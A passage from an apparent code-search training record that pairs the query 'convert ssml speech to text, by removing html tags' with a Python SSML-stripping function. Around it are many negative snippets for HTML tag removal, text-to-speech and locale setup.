msg[\"event\"]\n\n assert not msg[\"payload\"][\"endpoints\"]", "def on_intent(intent_request, session):\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"GetLottozahlen\":\n return get_Lottozahlen(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def _try_to_get_an_english_value(self, localized_values):\n if not localized_values:\n return None\n\n for localized_value in localized_values:\n if localized_value.language in self.ENGLISH_LANGUAGE_CODES:\n return localized_value.value\n\n return first_or_default(localized_values).value", "def play_human_custom(env):\n play_human(env)", "def InitLocale(self):\n self.ResetLocale()\n if 'wxMSW' in wx.PlatformInfo:\n import locale\n try:\n lang, enc = locale.getdefaultlocale()\n self._initial_locale = wx.Locale(lang, lang[:2], lang)\n # locale.setlocale(locale.LC_ALL, lang)\n # locale.setlocale(locale.LC_ALL, 'C')\n with open('./launch.log', 'a') as fp:\n fp.write(f'wxApp_LocaleFix.InitLocale: lang = {lang}\\n')\n print(lang)\n except (ValueError, locale.Error) as ex:\n target = wx.LogStderr()\n orig = wx.Log.SetActiveTarget(target)\n with open('./launch.log', 'a') as fp:\n fp.write(f'wxApp_LocaleFix.InitLocale:except-0 Unable to set default locale: \\'{ex}\\'\\n')\n print(\"Unable to set default locale: '{}'\".format(ex))\n wx.LogError(\"Unable to set default locale: '{}'\".format(ex))\n wx.Log.SetActiveTarget(orig)\n try:\n locale.setlocale(locale.LC_ALL, lang.replace('_', '-'))\n except (ValueError, locale.Error) as ex:\n locale.setlocale(locale.LC_ALL, lang.replace('-', '_'))\n target = wx.LogStderr()\n orig = wx.Log.SetActiveTarget(target)\n with 
open('./launch.log', 'a') as fp:\n fp.write(f'wxApp_LocaleFix.InitLocale:except-1 Unable to set default locale: \\'{ex}\\'\\n')\n print(\"Unable to set default locale: '{}'\".format(ex))\n wx.LogError(\"Unable to set default locale: '{}'\".format(ex))\n wx.Log.SetActiveTarget(orig)", "def get_adapt_intent(self, utterance, lang=\"en-us\"):\n msg = Message(\"intent.service.adapt.get\",\n {\"utterance\": utterance, \"lang\": lang},\n context={\"destination\": \"intent_service\",\n \"source\": \"intent_api\"})\n\n resp = self.bus.wait_for_response(msg,\n 'intent.service.adapt.reply',\n timeout=self.timeout)\n data = resp.data if resp is not None else {}\n if not data:\n LOG.error(\"Intent Service timed out!\")\n return None\n return data[\"intent\"]", "def is_forced(self, lang):\r\n return False", "def _initializeLocale():\n \n if sys.platform == constants.WIN32:\n locale.setlocale(locale.LC_ALL, \"\")\n else:\n if constants.LC_ALL in os.environ:\n try:\n locale.setlocale(locale.LC_ALL, os.environ[constants.LC_ALL])\n return\n except locale.Error:\n # First try did not work, encoding must be set first then set locale.\n pass\n languageCode, encoding = locale.getdefaultlocale()\n if languageCode is None:\n languageCode = \"en_US\"\n # Set the encoding of the Python environment if no encoding is set.\n if encoding is None:\n encoding = constants.UTF8\n if encoding.lower() == \"utf\":\n encoding = constants.UTF8\n try:\n locale.setlocale(locale.LC_ALL, \"%s.%s\" % (languageCode, encoding))\n except locale.Error:\n try:\n locale.setlocale(locale.LC_ALL, \"en_US.UTF-8\")\n except locale.Error:\n locale.setlocale(locale.LC_ALL, \"C\")" ]
[ "0.5877872", "0.5590493", "0.54645765", "0.54645765", "0.5408452", "0.5357488", "0.5357488", "0.53020567", "0.52696717", "0.5181241", "0.5174385", "0.5174385", "0.5167612", "0.51544356", "0.5071739", "0.5060613", "0.5031619", "0.49786136", "0.4932573", "0.4868343", "0.48520908", "0.48400244", "0.48286358", "0.48147333", "0.47970474", "0.47958162", "0.47594538", "0.4735542", "0.4662261", "0.46455666", "0.4628919", "0.45999712", "0.4555862", "0.45481646", "0.4547252", "0.45278513", "0.45027298", "0.45021227", "0.45002967", "0.44875798", "0.4465218", "0.4465218", "0.44615605", "0.44596776", "0.44488686", "0.44473162", "0.4447059", "0.44438565", "0.44437882", "0.44410273", "0.44259438", "0.44233277", "0.4395368", "0.43847686", "0.4365664", "0.43587998", "0.4358335", "0.4355626", "0.43522638", "0.43430126", "0.43429708", "0.43269393", "0.43264398", "0.4324395", "0.4319224", "0.4317371", "0.43141565", "0.4314141", "0.43076912", "0.42993146", "0.42965984", "0.42923018", "0.4288771", "0.4281695", "0.42747396", "0.42629808", "0.4260062", "0.42588806", "0.4257598", "0.4257598", "0.42476434", "0.42340103", "0.42328084", "0.42313045", "0.4231242", "0.42287582", "0.42266932", "0.42238793", "0.42238793", "0.4222837", "0.42227015", "0.42214206", "0.4221301", "0.42187518", "0.4217171", "0.4214136", "0.41984046", "0.41934243", "0.41870832", "0.41855055" ]
0.5607832
1
convert ssml speech to text, by removing html tags.
def convert_speech_to_text(ssml_speech):
    # type: (str) -> str
    s = SSMLStripper()
    s.feed(ssml_speech)
    return s.get_data()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ssml_to_text(ssml):\n return re.sub(r\"<[^>]+>\", \"\", ssml)", "def convert_text_to_ssml(chunk):\r\n # Escape chars that are forbidden in SSML\r\n chunk = chunk.replace('\"', \"&quot;\").replace('&', \"&amp;\").replace(\"'\", \"&apos;\").replace(\"<\", \"&lt;\").replace(\">\", \"&gt;\")\r\n # <p></p> makes a longer pause happen between paragraphs\r\n chunk = chunk.replace(\"\\r\\n\\r\\n\", \"</p>\\n<p>\").replace(\"\\n\\n\", \"</p>\\n<p>\")\r\n chunk = \"<speak><amazon:auto-breaths><p>\" + chunk + \"</p></amazon:auto-breaths></speak>\"\r\n # Ensure no duplicate tags\r\n chunk = chunk.replace(\"</p></p>\", \"</p>\").replace(\"</p>\\n</p>\", \"</p>\").replace(\"<p><p>\", \"<p>\").replace(\"<p>\\n<p>\", \"<p>\")\r\n return chunk", "def _convert_speech_to_text(self, storage_uri):\n\n responses = self._convert_speech_to_text_by_api(storage_uri)\n texts = [result.alternatives[0].transcript for result in responses.results]\n self._texts = '\\n\\n'.join(texts)", "def get_html2text(html):\n text_maker = html2text.HTML2Text()\n text_maker.body_width = 0\n return text_maker.handle(html)", "def strip_tags(html):\n if html is None:\n html = ''\n s = MLStripper()\n s.feed(html)\n return s.get_data()", "def remove_html( html):\n return html2txt(html)", "def strip_tags(self, html):\n s = MLStripper()\n s.feed(html)\n return s.get_data()", "def convert_html():\n return", "def html_to_text(html):\n s = TextExtractorHTMLParser()\n s.feed(html)\n return s.get_text()", "def remove_html_tags(text):\n print('VOU REMOVER AS TAGS DA STRING')\n clean = re.compile('<.*?>')\n print('',re.sub(clean, '', text))\n return re.sub(clean, '', text)", "def remove_html_tags(self,text):\n #https://medium.com/@jorlugaqui/how-to-strip-html-tags-from-a-string-in-python-7cb81a2bbf44\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)", "def strip_tags(text):\n # Remove header tags\n p = re.compile(\"<\\?.+?\\?>\") \n text = re.sub(p, \"\", text)\n\n # Remove <HOO>, <p> and <s> tags\n text = text.replace(\"<p>\",\"\")\n text = text.replace(\"</p>\",\"\")\n text = text.replace(\"<s>\",\"\")\n text = text.replace(\"</s>\",\"\")\n text = text.replace(\"<HOO>\",\"\")\n text = text.replace(\"</HOO>\",\"\")\n\n return text", "def remove_html_tags_fun(self):\n cleaner = re.compile('<.*?>')\n cleaned_text = re.sub(cleaner, '', self.doc)\n cleaned_text = re.sub('[\\n\\t]', '', cleaned_text)\n self.doc = cleaned_text", "def _html_text(self, html):\n ee = None\n try: return html.html_text()\n except Exception, e: ee = e; pass\n try: return html.xml_text()\n except Exception, e: print \"HtmlDocument/text\", ee, e; pass\n try: return str(html)\n except Exception, e: print \"HtmlDocument/text\", e; return \"&nbsp;\"", "def remove_html_tags(html_text: str) -> str:\n document = fromstring(html_text)\n text = document.text_content()\n return text.strip()", "def stripHTMLTags (html):\n text = html\n \n # apply rules in given order!\n rules = [\n { r'>\\s+' : u'>'}, # remove spaces after a tag opens or closes\n { r'\\s+' : u' '}, # replace consecutive spaces\n { r'\\s*<br\\s*/?>\\s*' : u'\\n'}, # newline after a <br>\n { r'</(div)\\s*>\\s*' : u'\\n'}, # newline after </p> and </div> and <h1/>...\n { r'</(p|h\\d)\\s*>\\s*' : u'\\n\\n'}, # newline after </p> and </div> and <h1/>...\n { r'<head>.*<\\s*(/head|body)[^>]*>' : u'' }, # remove <head> to </head>\n { r'<a\\s+href=\"([^\"]+)\"[^>]*>.*</a>' : r'\\1' }, # show links instead of texts\n { r'[ \\t]*<[^<]*?/?>' : u'' }, # remove remaining tags\n { r'^\\s+' : u'' } # remove spaces 
at the beginning\n ]\n \n for rule in rules:\n for (k,v) in rule.items():\n regex = re.compile (k)\n text = regex.sub (v, text)\n \n # replace special strings\n special = {\n '&nbsp;' : ' ', '&amp;' : '&', '&quot;' : '\"',\n '&lt;' : '<', '&gt;' : '>'\n }\n \n for (k,v) in special.items():\n text = text.replace (k, v)\n\n filtered = filter(lambda x: not re.match(r'^\\s*$', x), text) \n finaltext = re.sub(u'分享:','', filtered)\n return finaltext", "def textilize(s):\n s = s.replace(\"<p>\", \" \").replace('&nbsp;', ' ')\n return _re_html.sub(\"\", s)", "def RemoveHTMLTags(self, data):\n return self.UnescapeHTMLEntities(lxml.html.fromstring(data).text_content())", "def remove_Tags(self,text):\n cleaned_text = re.sub('<[^<]+?>', '', text)", "def remove_html_tags(text: str) -> str:\n return re.sub('<.*?>', '', text).strip()", "def convert_html_to_text(html_str: str, ignore_tags: None = None) -> str:\n if not html_str:\n return \"\"\n if html_parser is None:\n return strip_tags(html_str)\n\n parser = HTMLParser(encoding=\"utf-8\")\n root = html_parser.fromstring(html_str.encode(\"utf-8\"), parser=parser)\n try:\n body = root.xpath(\"./body\")[0]\n except IndexError:\n # No body element\n body = root\n\n for tag in HTML_GARBAGE:\n els = body.xpath(\".//\" + tag)\n for el in els:\n el.getparent().remove(el)\n\n convert_element(body, ignore_tags=ignore_tags)\n\n text = html_parser.tostring(\n body, pretty_print=True, method=\"text\", encoding=\"utf-8\"\n ).decode(\"utf-8\")\n\n return \"\\n\".join(x.strip() for x in text.splitlines()).strip()", "def html_to_text(html_message):\r\n process = Popen(\r\n ['lynx', '-stdin', '-display_charset=UTF-8', '-assume_charset=UTF-8', '-dump'],\r\n stdin=PIPE,\r\n stdout=PIPE\r\n )\r\n # use lynx to get plaintext\r\n (plaintext, err_from_stderr) = process.communicate(\r\n input=html_message.encode('utf-8')\r\n )\r\n\r\n if err_from_stderr:\r\n log.info(err_from_stderr)\r\n\r\n return plaintext", "def synthesize_ssml_file(ssml_file):\n from google.cloud import texttospeech\n client = texttospeech.TextToSpeechClient()\n\n with open(ssml_file, 'r') as f:\n ssml = f.read()\n input_text = texttospeech.types.SynthesisInput(ssml=ssml)\n\n # Note: the voice can also be specified by name.\n # Names of voices can be retrieved with client.list_voices().\n voice = texttospeech.types.VoiceSelectionParams(\n language_code='en-AU',\n name='en-AU-Wavenet-D',\n ssml_gender=texttospeech.enums.SsmlVoiceGender.NEUTRAL)\n\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3,\n speaking_rate=0.80)\n\n response = client.synthesize_speech(input_text, voice, audio_config)\n\n # The response's audio_content is binary.\n filename = ssml_file\n try:\n filename = filename.replace('.txt', '.mp3')\n filename = filename.replace('../Articles/', '')\n filename = filename.replace(';', ' ')\n filename = filename.replace(\"'\", \" \")\n except Exception as e:\n print(e)\n print('Check replace command in synthesize_file.py file')\n\n with open(filename, 'wb') as out:\n out.write(response.audio_content)\n print(f'Audio content written to file: \\n{filename}\\n')", "def enml_to_html(enml):\n return normalize_enml(enml)", "def _remove_html_tags(self, text: str) -> str:\n pattern = r\"\"\"\n (?x) # Turn on free-spacing\n <[^>]+> # Remove <html> tags\n | &([a-z0-9]+|\\#[0-9]{1,6}|\\#x[0-9a-f]{1,6}); # Remove &nbsp;\n \"\"\"\n return re.sub(pattern, \" \", str(text))", "def remove_html(txt):\r\n TAG_RE = re.compile(r'<[^>]+>')\r\n return TAG_RE.sub(\"\", 
txt).strip()", "def _remove_tags(self, text):\n try:\n result = \"\".join(xml.etree.ElementTree.fromstring(text).itertext()).replace(\n \"\\n\\n\", \"\\n\"\n )\n except: # pylint: disable=bare-except\n result = text\n return result", "def remove_html_tags(text):\n if type(text) is pd.core.series.Series or type(text) is str:\n text = text.replace(\"'\", \" \").replace('\"', \" \")\n clean = re.compile('<.*?>')\n return re.sub(clean, ' ', text)\n return text", "def remove_html_tags(self, text, tags):\n\t\tcheck_if_any_type(text, [str, str])\n\n\t\tfor tag in tags:\n\t\t\tcheck_if_any_type(tag, [str, str])\n\t\t\ttext = re.compile('<\\/?%s\\/?>' % tag, re.U).sub('', text)\n\t\treturn text", "def cleaning(full_text):\n try:\n if open(RESULT_PATH):\n os.remove(RESULT_PATH)\n \n else:\n print(\"No output.mp3\")\n except Exception as e:\n print(str(e))\n\n text = full_text\n\n book = ''.join(text)\n\n\n book = book.replace('.', '.<eos>')\n book = book.replace('?', '?<eos>')\n book = book.replace('!', '!<eos>')\n\n sentences = book.split('<eos>')\n\n return sentences", "def remove_html_tags(text: str) -> str:\n clean = re.compile('<.*?>')\n return re.sub(clean, '', str(text))", "def clean_sotu(speech_link: str, headers: dict) -> str:\n response = requests.get(speech_link, headers=headers)\n sotu_soup = BeautifulSoup(response.content, 'html')\n text = sotu_soup.find('div', {'id': 'text'}).text.replace('< Previous\\xa0\\xa0\\xa0Next >', '').rstrip('^ Return to top\\n').strip()\n speech = text.lstrip('State of the Union Address').strip()\n return speech", "def html_text(self):\n return g.markdown_wiki.convert(self.data.text)", "def remove_html_tags_from_text(html_data, add_detectors=True, attached_tags=list, site_tags=list,\n exclude_site_tags=False, exclude_assignment=False):\n try:\n html_data = html.unescape(html_data)\n if add_detectors:\n html_data = __set_has_codeblock(html_data)\n html_data = __set_has_link(html_data)\n if html_data is None:\n return None\n stripper = HTMLStripper()\n stripper.feed(html_data)\n stripped_html = stripper.get_data()\n # remove newlines from string (since all posts starts/ends with <p>)\n stripped_html = ' '.join(stripped_html.split())\n if add_detectors:\n stripped_html = __set_has_hexadecimal(stripped_html)\n stripped_html = __set_has_numeric(stripped_html)\n # due to external tags also overwriting others, this has been omitted\n stripped_html = __set_has_tag(stripped_html, attached_tags, site_tags, exclude_site_tags)\n homework_list = constants.HOMEWORK_SYNONMS_LIST\n homework_list.sort(key=len, reverse=True)\n replacement_text = constants.QUESTION_HAS_HOMEWORK_KEY\n stripped_html = __set_has_homework_or_assignment(stripped_html, replacement_text, homework_list)\n if not exclude_assignment:\n assignment_list = constants.ASSIGNMENT_LIST\n replacement_text = constants.QUESTION_HAS_ASSIGNMENT_KEY\n stripped_html = __set_has_homework_or_assignment(stripped_html, replacement_text, assignment_list)\n return stripped_html\n except TypeError as error:\n # print html_data\n print(\"Error occurred in text_processor.remove_html_tags_from_text\", error)\n return None", "def clean_text_from_html_tags(message):\n regex_style_tag = re.compile('<style.*?>[\\\\s\\\\S]*?</style>')\n message = re.sub(regex_style_tag, \" \", message)\n regex_script_tag = re.compile('<script.*?>[\\\\s\\\\S]*?</script>')\n message = re.sub(regex_script_tag, \" \", message)\n regex_html_tags = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')\n message = re.sub(regex_html_tags, \" \", 
message)\n return message", "def parsingconvtext(retrievedtext,customtextlist):\r\n if not retrievedtext: #in case empty text \r\n retrievedtext=changenonetostr(retrievedtext)\r\n newtext=BeautifulSoup(retrievedtext).get_text() \r\n #newtext=changenonetostr(retrievedtext)\r\n #newtext=BeautifulSoup(newtext).get_text() \r\n #remove http links\r\n newtext=re.sub(r'http\\S+', '', newtext)\r\n newtext=re.sub(r'\\r\\r\\r\\n', ' ', newtext)\r\n #remove LL specific text\r\n if customtextlist:\r\n for i in customtextlist:\r\n newtext=re.sub(i, '', newtext)\r\n return newtext", "def normalize_enml(enml):\n content = extract_contents(enml)\n\n content = content.replace('\\xC2\\xA0', ' ')\n content = content.encode('utf-8')\n content = content.replace('</en-media>', '') # Some devices have closing media tags, others dont\n\n # Convert special chars\n content = content.replace('&amp;', '&')\n content = content.replace('&quot;', '\"')\n content = content.replace('&gt;', '>')\n content = content.replace('&lt;', '<')\n content = content.replace('&nbsp;', ' ')\n\n # Remove anchor tag from inline src/href urls\n content = re.sub(r'(href|src)(=[\\'\"]?[^<]*)(<a[^>]+>)(.*?)(</a>)', r'\\1\\2\\4', content)\n\n bits = re.split(r'(<div[^>]*>.*?</div>)', content)\n\n if bits[0].strip() == '': # Get rid of blank top lines\n bits.pop(0)\n\n if len(bits) > 0 and '<div>' not in bits[0]:\n bits[0] = '<div>{0}</div>\\n'.format(bits[0])\n\n for k, v in enumerate(bits):\n if not v:\n bits[k] = '\\n'\n\n return ''.join(bits)", "def removeMarkup(self, text):\n text = TextFormat.stripTagRe.sub('', text)\n return unescape(text)", "def remove_tags(raw):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, ' ', raw)\n return cleantext", "def replace_with_text(self):\r\n self.parser.stripTags(self.get_top_node(), 'b', 'strong', 'i', 'br', 'sup')", "def promed_html_to_formatted_text(html):\n # This is to fix some cases in malformed html where <s aren't esacaped.\n # >s can be parsed without escaping.\n normed_html = html.\\\n replace(\"<<\", \"&lt;<\").\\\n replace(\"<http\", \"&lt;http\").\\\n replace(\"< \", \"&lt; \")\n return dom_tree_to_formatted_text(BeautifulSoup(normed_html))", "def remove_html_tags(text):\n clean = re.compile('<.*?>|&ndash; ')\n return re.sub(clean, '', text)", "def remove_html_tags(text):\n clean = re.compile('<.*?>|&ndash; ')\n return re.sub(clean, '', text)", "def strip_html_tags(text):\r\n soup = BeautifulSoup(text, 'lxml')\r\n stripped_text = soup.get_text(separator=\" \")\r\n return stripped_text", "def remove_html_tags(text):\n tag_pattern = re.compile(r'<[^>]+>')\n return tag_pattern.sub('', text)", "def remove_tags(text):\n # Remove HTML tags\n soup = BeautifulSoup(text, \"html.parser\")\n [s.extract() for s in soup(['iframe', 'script'])]\n stripped_text = soup.get_text()\n stripped_text = re.sub(r'[\\r|\\n|\\r\\n]+', '\\n', stripped_text)\n \n \n text = unicodedata.normalize('NFKD', stripped_text).encode('ascii', 'ignore').decode('utf-8', 'ignore') # Remove Accented characters\n text = re.sub(r'[^\\x00-\\x7F]+','', text) # Remove Non-Ascii characters\n text = re.sub(\"[a-z0-9\\.\\-+_]+@[a-z0-9\\.\\-+_]+\\.[a-z]+\", '', text) # Remove Emails\n text = re.sub(r\"http\\S+\", \"\", text) # Remove URLs\n return text", "async def text_to_speech(self, tts_input: str) -> str:\n self.process_event(\n PipelineEvent(\n PipelineEventType.TTS_START,\n {\n \"engine\": self.tts_engine,\n \"language\": self.pipeline.tts_language,\n \"voice\": self.pipeline.tts_voice,\n \"tts_input\": tts_input,\n },\n 
)\n )\n\n try:\n # Synthesize audio and get URL\n tts_media_id = tts_generate_media_source_id(\n self.hass,\n tts_input,\n engine=self.tts_engine,\n language=self.pipeline.tts_language,\n options=self.tts_options,\n )\n tts_media = await media_source.async_resolve_media(\n self.hass,\n tts_media_id,\n None,\n )\n except Exception as src_error:\n _LOGGER.exception(\"Unexpected error during text to speech\")\n raise TextToSpeechError(\n code=\"tts-failed\",\n message=\"Unexpected error during text to speech\",\n ) from src_error\n\n _LOGGER.debug(\"TTS result %s\", tts_media)\n\n self.process_event(\n PipelineEvent(\n PipelineEventType.TTS_END,\n {\n \"tts_output\": {\n \"media_id\": tts_media_id,\n **asdict(tts_media),\n }\n },\n )\n )\n\n return tts_media.url", "def remove_html_tags(text):\r\n clean = re.compile('<.*?>')\r\n return re.sub(clean, '', text)", "def strip_html_tags(text):\n if text is np.nan:\n return text\n regex = re.compile(r\"<.*?>\")\n return re.sub(regex, \"\", text)", "def text2speech(text):\n try:\n myobj = gTTS(text=text, lang='en', slow=False)\n myobj.save(\"tmp.mp3\")\n playsound(\"tmp.mp3\")\n os.remove(\"tmp.mp3\")\n return True\n except Exception as e:\n mytext = \"Sorry I couldn't understand, or not implemented to handle this input\"\n print(mytext)\n myobj = gTTS(text=mytext, lang='en', slow=False)\n myobj.save(\"tmp.mp3\")\n playsound(\"tmp.mp3\")\n os.remove(\"tmp.mp3\")\n print(e)\n return False", "def html_to_text(text):\n # type (str) -> str\n soup = BeautifulSoup(text, \"html.parser\")\n return \"\\n\".join(soup.stripped_strings)", "def set_speech_ssml(self, ssml):\n self.response.outputSpeech.type = 'SSML'\n self.response.outputSpeech.ssml = ssml", "def xss_strip_all_tags(s):\n return s\n def fixup(m):\n text = m.group(0)\n if text[:1] == \"<\":\n return \"\" # ignore tags\n if text[:2] == \"&#\":\n try:\n if text[:3] == \"&#x\":\n return unichr(int(text[3:-1], 16))\n else:\n return unichr(int(text[2:-1]))\n except ValueError:\n pass\n elif text[:1] == \"&\":\n import htmlentitydefs\n entity = htmlentitydefs.entitydefs.get(text[1:-1])\n if entity:\n if entity[:2] == \"&#\":\n try:\n return unichr(int(entity[2:-1]))\n except ValueError:\n pass\n else:\n return unicode(entity, \"iso-8859-1\")\n return text # leave as is\n \n return re.sub(\"(?s)<[^>]*>|&#?\\w+;\", fixup, s)", "def audio2text(audio):\n r = sr.Recognizer()\n with sr.AudioFile(audio) as source:\n audio = r.listen(source)\n\n text = r.recognize_google(audio, language=\"de_DE.utf8\")\n print(f'fetched {file}: {text}')\n return text", "def reformat_text(self, text):\n xml = BeautifulSoup(text)\n self.remove_header_and_footer(xml)\n self.process_superscripts(xml)\n self.remove_footnotes(xml)\n text = xml.get_text() # Strip XML tags.\n text = self.join_hyphenated_words(text)\n text = self.remove_linebreaks(text)\n return text", "def convertHTML(self, text):\n return text.replace('&#39;', \"'\")", "def remove_html_tags(text):\n import re\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)", "def remove_html_tags(text):\n import re\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)", "def remove_html_tags(text):\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)", "def remove_html_tags(text):\n import re\n clean = re.compile('<.*?>|\\\\n')\n return re.sub(clean, '', text)", "def get_text_hook(raw):\n soup = bs4.BeautifulSoup(quopri.decodestring(raw), features=\"lxml\")\n return soup.text", "def strip_html(inputString):\r\n return BeautifulSoup(inputString, 
\"html.parser\").text", "def remove_html(text):\n return re.sub(r'<.*?>', r'', text)", "def getHTMLText(self, s):\r\n\r\n # Removes any \"<\" or \">\" from the text, and replaces line ends with <br> tags\r\n if s is not None:\r\n res = str(s)\r\n res = string.replace(res, \">\", \"&gt;\")\r\n res = string.replace(res, \"<\", \"&lt;\")\r\n res = string.replace(s, \"\\n\", \"<br style='mso-data-placement:same-cell;'/>\")\r\n else:\r\n res = \"\"\r\n\r\n # Inserts formatting tag around text, if defined\r\n if self.formatBeginTag:\r\n res = self.formatBeginTag + res + self.formatEndTag\r\n\r\n return res", "def strip_html_tags(text):\n soup = BeautifulSoup(text, \"html.parser\")\n stripped_text = soup.get_text(separator=\" \")\n return stripped_text", "def strip_html_tags(text):\n soup = BeautifulSoup(text, \"html.parser\")\n stripped_text = soup.get_text(separator=\" \")\n return stripped_text", "def remove_tags(text):\n tree = html.fromstring(text)\n return tree.xpath(\"//text()\")", "def remove_html_tags(text):\n import re\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text).rstrip('...')", "def convert_srt_to_txt(text, join=False):\n lines = text.split('\\n')\n result = []\n for line in lines:\n if not line.strip(): # Skipping empty lines\n continue\n elif line.strip().isdigit(): # Skip lines containing only numbers\n continue\n elif (line.startswith(\"WEBVTT\") or\n line.startswith(\"Kind: captions\") or\n line.startswith(\"Language: en\")): # Skipping lines containing service information\n continue\n # We skip lines with the format \"00:00:00,000 --> 00:00:03,090\"\n elif re.match(r\"\\d{2}:\\d{2}:\\d{2}.\\d{3} --> \\d{2}:\\d{2}:\\d{2}.\\d{3}\", line.strip()):\n continue\n else:\n result.append(line.strip())\n if join:\n out = join_lines(result) # Combining strings into sentences\n else:\n out = \"\\n\".join(result) # Combining strings without parsing into sentences\n return out", "def html_to_text(html):\n html_parser = 'html5lib'\n soup = BeautifulSoup(html, html_parser)\n pretty_html = soup.prettify()\n pretty_soup = BeautifulSoup(pretty_html, html_parser)\n text = pretty_soup.get_text()\n lines = [s for s in text.splitlines() if not re.search(r'^\\s*$', s)]\n return os.linesep.join(lines)", "def stripHtml(html):\n\t# kinda works\n\tres = html.replace(\"&lt;\", \"<\")\n\tres = res.replace(\"&gt;\", \">\")\n\tres = re.sub(r'<[^>]+>', '', res)\n\treturn res", "def striphtml(content):\n\tif not isinstance(content, basestring):\n\t\treturn u''\n\tcontent = re_script.sub(u'',content)\n\tdoc = html.fragment_fromstring(content, create_parent=True)\n\tclean.clean_html(doc)\n\treturn unicode(re_nl.sub(u'', doc.text_content()))", "def clean_html(html):\n html = re.sub(r\"(?s)<!--(.*?)-->[\\n]?\", \"\\\\1\", html)\n html = re.sub(r\"<!--\", \"\", html)\n if html == '':\n return ''\n s = MLStripper()\n s.feed(html)\n return s.get_data().strip()", "def stripHTMLTags (html):\r\n import re\r\n text = html\r\n \r\n # apply rules in given order!\r\n rules = [\r\n { r'>\\s+' : u'>'}, # remove spaces after a tag opens or closes\r\n { r'\\s+' : u' '}, # replace consecutive spaces\r\n { r'\\s*<br\\s*/?>\\s*' : u'\\n'}, # newline after a <br>\r\n #{ r'</(div)\\s*>\\s*' : u'\\n'}, # newline after </p> and </div> and <h1/>...\r\n #{ r'</(p|h\\d)\\s*>\\s*' : u'\\n\\n'}, # newline after </p> and </div> and <h1/>...\r\n { r'<head>.*<\\s*(/head|body)[^>]*>' : u'' }, # remove <head> to </head>\r\n { r'<a\\s+href=\"([^\"]+)\"[^>]*>.*</a>' : u'' }, # show links instead of texts\r\n { r'[ \\t]*<[^<]*?/?>' 
: u'' }, # remove remaining tags\r\n { r'^\\s+' : u'' } # remove spaces at the beginning\r\n ]\r\n \r\n for rule in rules:\r\n for (k,v) in rule.items():\r\n regex = re.compile (k)\r\n text = regex.sub (v, text)\r\n \r\n # replace special strings\r\n special = {\r\n '&nbsp;' : ' ', '&amp;' : '&', '&quot;' : '\"',\r\n '&lt;' : '<', '&gt;' : '>'\r\n }\r\n \r\n for (k,v) in special.items():\r\n text = text.replace (k, v)\r\n \r\n return text", "def remove_html_tags(data):\n p = re.compile(r'<.*?>')\n return p.sub('', data)", "def strip_html(text):\n soup = BeautifulSoup(text, \"html.parser\")\n return soup.get_text()", "def clean_xml_tags(text):\n tag_re = re.compile(r'<[^>]+>')\n text = tag_re.sub('', text)\n return text", "def sentences(summary, nlp):\n text = remove_spurious_words(text_of(summary))\n all_sentence = [sentence for sentence in re.split(\"[。,?!\\n]\", text) if sentence]\n all_sentence = [re.sub('[ ]+', ' ', sentence.encode('gb2312', 'ignore').decode('gb2312')).strip() for sentence in\n all_sentence]\n return [nlp.ner(sentence) for sentence in all_sentence if sentence]", "def _get_plain_text(self, url, soup, site):\n print('Get plaint text: ' + url)\n title = str(soup.find(class_=self._title_tags[site]))\n content = str(soup.find(class_=self._content_tags[site]))\n # h = html2text.HTML2Text() # uncomment this segment of code\n # h.ignore_links = True # if you want to get plain text\n # h.ignore_images = True\n # title = h.handle(title)\n # content = h.handle(content)\n if title == None or content == None:\n print('Different website structure: ' + url)\n return ''\n return self._clean(title + content, no_punc=True) # with symbols\n # return title + content # without symbols", "def cleanText(text):\n try:\n text = str(text)\n\n # remove contactions and stop words\n text = contractions(text)\n # remove html entities\n cleanr = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')\n new_text = cleanr.sub('', text.strip())\n return re.sub(r'\\s+', ' ', re.sub(r'\\W+', \" \", new_text))\n # TAG_RE = re.compile(r'<[^>]+>')\n except:\n print(\"An exception occurred with: \" + text)\n return str(text)", "def html(input):\n output=atpic.cleaner_alex.clean(input)\n return output", "def strip_logfile_html(text):\n out_text = \"\"\n buff = \"\"\n start_tag = \"\"\n end_tag = \"\"\n context = \"none\"\n for i in range(len(text)):\n c = text[i]\n # print \"c = \"+str(c)+\" context = \"+str(context)\n if c == \"<\":\n if context == \"none\":\n # Possible start of a tag, depending on\n # next character\n context = \"putative_tag\"\n buff = c\n else:\n # Everything up to this needs to\n # be dumped directly to output\n out_text = out_text + escape_xml_characters(buff)\n elif context == \"putative_tag\":\n buff = buff + c\n if c.isalpha():\n context = \"start_tag\"\n elif c == \"/\":\n context = \"end_tag\"\n elif c == \"!\":\n context = \"comment_tag\"\n else:\n # Not a tag so dump it\n context = \"none\"\n out_text = out_text + escape_xml_characters(buff)\n elif context == \"start_tag\" or context == \"end_tag\" or context == \"comment_tag\":\n buff = buff + c\n if c == \">\":\n if context == \"start_tag\":\n # End of a start tag\n # Process it and see if we can\n # salvage something\n salvage_text = salvage_tag_data(buff)\n if salvage_text != \"\":\n out_text = out_text + escape_xml_characters(salvage_text)\n # Reset the buffer\n context = \"none\"\n buff = \"\"\n elif context == \"end_tag\":\n # End of an end tag\n # Throw this away (for now)\n context = \"none\"\n buff = \"\"\n elif 
